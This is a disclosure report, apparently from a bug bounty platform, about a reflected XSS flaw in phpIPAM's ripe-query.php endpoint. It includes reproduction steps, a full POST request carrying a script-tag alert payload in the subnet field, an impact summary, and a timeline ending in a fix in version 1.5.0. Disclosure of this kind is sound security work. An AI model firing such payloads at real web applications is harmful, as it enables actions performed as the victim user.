Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Valid

Reported on

Jan 28th 2022


Description

Reflected XSS attacks AKA non-persistent attacks when a malicious script is reflected off of a web application to the victim’s browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.

Proof of Concept

Steps to Reproduce:- 
Login in to webAPP using Admin Creds. 
Navigate to SubNET "http://localhost/phpipam/index.php?page=subnets&section=1" 
Choose any SubNet and Click on Edit 
Click on Get Information button of SubNet Input field ANd Capture The Request using proxy tool and Change SubNet IP to XSS PayLoad As you see in my below POST REQUEST

=======================================================================================

POST /phpipam/app/admin/subnets/ripe-query.php HTTP/1.1
Host: localhost
Content-Length: 47
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Cookie: phpipam=keqtftn3sihc7kbu6m79rdlis0;
Connection: close

subnet=<script>alert(document.domain);</script>

Impact

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

We are processing your report and will contact the phpipam team within 24 hours. a year ago
We have contacted a member of the phpipam team and are waiting to hear back a year ago
We have sent a follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. a year ago
phpipam/phpipam maintainer has acknowledged this report a year ago
garyallan modified the report
a year ago
garyallan modified the report
a year ago
garyallan validated this vulnerability a year ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
AggressiveUser
a year ago

Researcher


@admin @maintainer can you assign CVE ID if it’s possible for this report

Jamie Slome
a year ago

Admin


We sure can, we just need confirmation from the maintainer before we proceed with a CVE.

@maintainer - are you happy for us to assign and publish a CVE for this report?

garyallan marked this as fixed in 1.5.0 with commit 47c104 a year ago
garyallan has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation